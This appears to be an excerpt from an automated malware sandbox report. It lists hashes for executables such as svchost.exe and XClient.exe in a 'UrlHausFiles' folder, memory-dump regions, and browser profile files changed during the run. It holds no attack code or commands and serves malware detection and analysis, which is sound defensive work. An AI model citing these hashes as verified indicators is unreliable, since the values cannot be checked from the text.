SHA512 029fd7b8b8b03a174cdc1c52d12e4cf925161d6201bbe14888147a396cd0ba463fd586d49daf90ec00e88d75d290abfeb0bb7482816b8a746e9c5ce58e464bcf

memory/752-814-0x00007FF758F00000-0x00007FF758F7D000-memory.dmp

memory/1088-811-0x00007FF6EBAF0000-0x00007FF6EBAFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D92B.tmp.zx.exe

MD5 4edcaedbf0e3ea4480e56d161f595e8c
SHA1 e46818f6e463d5c7d05e900470d4565c482ca8e2
SHA256 f3e87137e58e1f3878ed311b719fe1e4d539a91327a800baf9640543e13a8425
SHA512 3ab0c1d41a24cd7be17623acbdae3dd2f0d0fd7838e6cb41fe7427bca6a508157e783b3d8c9717faa18f6341431226719ee90fa5778626ce006f48871b565227

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 5e29a1fb83113320f38278bc60fab3d0
SHA1 d0d1317751bac9e8ad70fcd2d637a7debba204db
SHA256 f9e3a8f71f48f995134f7f26ffd3fd6c84d70b719c1373b07faf70c9c160a5f4
SHA512 327dd8a82bf9f42e0363918915b01ed2d81b8ba795dc27e41963312551b4bf581980ca6a55f6d7676473ef4714c053eee28614dd79f105d53e762f4797d09b73

memory/5940-902-0x00007FF6A80C0000-0x00007FF6A82F5000-memory.dmp

memory/5940-899-0x00007FF6A80C0000-0x00007FF6A82F5000-memory.dmp

memory/5940-904-0x00007FF6A80C0000-0x00007FF6A82F5000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

MD5 fb7784fed6723631ba38992872d9da6a
SHA1 30bd4ede876d994a45507cc8ff582af5683ca183
SHA256 90a1c059e5992791e0b94da3098816346c8bd33b724039e0a4ff1a7623d5865a
SHA512 27944b86bb862055021d96d3ada0a45657c04134b7424b8156ec20b15bb75267885fd8546619781e18a43a3758e2a1fa1e3614da9596d47b2a1cf8498d106cec

memory/4088-909-0x00000000065E0000-0x0000000006646000-memory.dmp

memory/3076-911-0x0000000000400000-0x000000000044B000-memory.dmp

memory/4088-921-0x0000000007400000-0x0000000007450000-memory.dmp

memory/2696-927-0x00007FF7BCE50000-0x00007FF7BDAA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c03d23a8155753f5a936bd7195e475bc
SHA1 cdf47f410a3ec000e84be83a3216b54331679d63
SHA256 6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca
SHA512 6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3d68c7edc2a288ee58e6629398bb9f7c
SHA1 6c1909dea9321c55cae38b8f16bd9d67822e2e51
SHA256 dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b
SHA512 0eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f

C:\Users\Admin\Downloads\UrlHausFiles\test.exe

MD5 8dc615a726d1e47c1bbda80d36de8eb4
SHA1 c37198624c15c5a541fce60a164ee0f957b9c269
SHA256 e00aa3c4c4c619fc05fc7deec32ca06959076b3df1063fd2da4205cca4882a94
SHA512 ab52c58de0e7242f78165450498b64e610c36bfc63cb302b33d0400100ae3cd12b444a7b6ed708e0f11bb8b46b5c4d4147ab0ba1ccc5b3633549b65a12146031

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 03766e07405a29d6cd6d67fce20afeec
SHA1 5ec22c8c3f915187b33cf42ecabb216196470970
SHA256 c00344a16e9aa0d0f53e2338437536929648025b7f4463c9423690e1474a50e5
SHA512 7cf58c7f54e60b952ff1ac4ea6bc9d4f0f8bdabfd91ed00caedc6520aa21b58248cb94f9f220da3297958a1db81b59ead32875f476b29f70a12067e8825e3804

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1b269c9e02110f42d50e20ca269af800
SHA1 0389a428b0328e4ec57c4a2777743459d7410504
SHA256 edc5d983fe5d20d1d2fd0823bfa0f325824fa44cd2e73b032965b7300823e61e
SHA512 3144a7057a5d5a75db29b8c50d098b394a1ceb372d7e97a0a950a608a5f1f3eb858cbe01c79e4a0b8a247ebf4a2f0c2a369a7a38b711ac65f0c6cf885396ec0f

memory/1992-978-0x0000000000ED0000-0x0000000001030000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\V1.1.exe

MD5 7b1d21282a65bac0410541f7466c7038
SHA1 9a1010aba1b23ba1e118c8cd29fff8ecd39431d9
SHA256 e465f41c82dcc8e91aa580b348064196c696a6b76b28ee82d5e194ca2261e49e
SHA512 5a5c4896af0095067e88e0b0d844115df59cc9b25d01d8ee541e88666c15448d1d3dd2dd7796a438616db10016e84450ebd1fd2441b47277f74a3098ed2629c3

memory/1992-987-0x0000000025F90000-0x0000000025FD2000-memory.dmp

memory/2392-988-0x0000000000400000-0x000000000064F000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

MD5 d76e1525c8998795867a17ed33573552
SHA1 daf5b2ffebc86b85e54201100be10fa19f19bf04
SHA256 f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd
SHA512 c02e1dcea4dc939bee0ca878792c54ff9be25cf68c0631cba1f15416ab1dabcd16c9bb7ad21af69f940d122b82880b1db79df2264a103463e193f8ae157241dd

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

MD5 ca480193e4b8159dd1283118ebde8896
SHA1 857fb4852f31428ead5e2d9fbd5bfb16d9714d1a
SHA256 377717dd342a9169589d1e2c8509d12ceafe9c43b3407ab16771ec611a367a2a
SHA512 a49927f1dffe8d14f592e767415c490f4bdc9fb5d7ce45f10f5e6c7aa5c20b79412abc8d4f799cfd88aeeac3ef73f55a9710503a9a612efb5d414ec95a3e7ed9

memory/4296-1015-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\update.exe

MD5 ffc2637acde7b6db1823a2b3304a6c6c
SHA1 8eac6fb5415f9338b1b131c42ed15ea70da22096
SHA256 35efc0520b78a1b413afee5dbe5d8b0674eea2acfc7d943de70a99b5b2fd92ef
SHA512 3f9f0182d69b66ea6168717f8e7239a0726066e011be1983da874f76ee308e67ef55cd08a2d8990cd9e4a663bbbbf56c3445275d72e8330255b3d0dd3b98859a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\06D4148FB55A65DDC0B3617260FF0892

MD5 11787b39f38dcae84937905dd1c389a5
SHA1 695631fe1fd02c7de5db29e8ac4e7267e34ebfb0
SHA256 e01c8cc012ad92455b81e79785c7114bb7c8a80ff6e1feeb74f0ba796752da8a
SHA512 171e702d4a88f2c5bc1079fee78f60085708d17ae257d02807fdd33f9e559ea6340ffd9f33953fc0262554428c05ccc87b4413fa633fa784ea1a77e80a34693b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\06D4148FB55A65DDC0B3617260FF0892

MD5 5bfa51f3a417b98e7443eca90fc94703
SHA1 8c015d80b8a23f780bdd215dc842b0f5551f63bd
SHA256 bebe2853a3485d1c2e5c5be4249183e0ddaff9f87de71652371700a89d937128
SHA512 4cd03686254bb28754cbaa635ae1264723e2be80ce1dd0f78d1ab7aee72232f5b285f79e488e9c5c49ff343015bd07bb8433d6cee08ae3cea8c317303e3ac399

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

MD5 708adef6da5ac2ffee5f01f277560749
SHA1 3dedb41674634e6b53dfaea704754cee7bddfbe3
SHA256 0fec722a795adc9e313422c62e8ff0c7dac935dfef78da6560e38455a7739e4a
SHA512 463927da961a3a52199d2a70dbf51aed7b600e45da5e71c73c9ea9b9971c32fc77b3f1d442400a4a4fe4d0a5bc024893f633a5d898dd9e955b9ed3a8d0d3ce28

memory/2984-1053-0x0000000010000000-0x0000000010026000-memory.dmp

memory/5948-1061-0x0000000000400000-0x000000000042E000-memory.dmp

memory/2696-1059-0x00007FF7BCE50000-0x00007FF7BDAA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 680ac3eb351fa5695226c02d374440f4
SHA1 199b9e1c310270c9b376dbb95a4c4165ce0ecd88
SHA256 4c12ce3f75bb90fba67dd1d3de6c2f6667252810aff265acca97b2ea3c9ef22d
SHA512 9776ad3884abe406c85a6e5bb80e39bf5200ab483af72c2b7b586ed80eb441a73edc3bda8f071c795a3e8526a2c9f8166e509cb0d7b0caf12f48d14f8ec78bf8

C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe

MD5 1fef0891d1e71750effaca0d02f218ee
SHA1 cbf1fdde74cda519c34c63eeabaff64bd9e0ecc9
SHA256 8dce0aecb8fe99a179e928fcc5e79d1c7e88b35cf9cdc911c3e75ba3d7e4f90b
SHA512 a864003b524e3467e839dc60f7191b36bebc4ba400c53834efa93a982064478cf5d1c079154c65aa3927ec3869bd4f38acd41eb79302e5616f4f7e40e85a5bf3

memory/1992-1140-0x00000000022B0000-0x000000000234E000-memory.dmp

memory/1992-1139-0x0000000001E00000-0x0000000001EA3000-memory.dmp

memory/1992-1141-0x0000000002350000-0x0000000002470000-memory.dmp

memory/1992-1138-0x0000000001800000-0x00000000018AE000-memory.dmp

memory/1992-1136-0x0000000001A80000-0x0000000001DF4000-memory.dmp

memory/1992-1135-0x0000000000DD0000-0x0000000000E8D000-memory.dmp

memory/1992-1134-0x0000000000D60000-0x0000000000DC7000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 c02ba0783524ac6a002584df32d7e17c
SHA1 255cee28715d8b61153c675597d47b129f392f13
SHA256 bd7691f88d4f137f854b08bbb49450e57524b794a41a4101b4d787d1b0f0005d
SHA512 7ed3471daac7069634a2e67b140b05a1a335b02c792533b80e9baf7ec948dd5f943b337ca7a93c36c8ad09038a5e11cffabea64f41c54a00dd47d90da6b3b5a9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\66ac0ad8-1b06-486e-b437-3e5497b88f58.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

MD5 16b50170fda201194a611ca41219be7d
SHA1 2ddda36084918cf436271451b49519a2843f403f
SHA256 a542a2170abf4de0cd79baeb2e8f08deaf6fdeea40e9fc1ec15cbeb988e7900a
SHA512 f07ed33310acc5008cda9dbf3c50e420ad3f76ed11b28b93b2bb32d47ddbb64c97b906babaf6edf2680bea5b6f7456c7986a8610cee30b867d3a07c4430f79e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 77dd45c22541443ae7d4a340ae40ad05
SHA1 6df1c240270c2efad5cecf15a19224527307464d
SHA256 e9c96504f928293c9ce6b99de2f9eb53d431d1bbd366adb7871cb8a6025de213
SHA512 3b2d0e65ea5ab2bde7ef5b9a74bcad6f7de5493a807f85c4a321ee3f00c89b626b3d5312cf957942e494cfa4d53d34b8a4cc31350410e4c7019172ade104424f

memory/2480-1235-0x00000000002F0000-0x0000000000302000-memory.dmp

memory/2480-1237-0x00000000022D0000-0x00000000022D6000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\a.exe

MD5 ff370f449a6e83018df4b4163380fc57
SHA1 012c030503055803fd192c60dcc9e4733f917025
SHA256 1aa867bb4fb60de654e5e166c0a0e45c3b131a0131484c6b8888fea501c37b3a
SHA512 b0b41d5b391f6cfd582830abe132b87dc9434768c78dca90b3b8aaffe40880f6bb07a120b60cd4832e72202ea7c8257f4ec20d0b152136f6fc1ceb0a2b23ad7e

C:\Users\Admin\Downloads\UrlHausFiles\XClient.exe

MD5 59a9510540fec35043b990deb270b139
SHA1 54d66862a4c08ebcba8029ec99d558725603f486
SHA256 9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f
SHA512 011ea8ffe125a6f68f149a0a5b7bcd95197ac8b7d3d7d362807ef984e971411f2b125921fbcbc183e95633555ac58c4e287b6a858f19e077dd9a8eb0975e3e06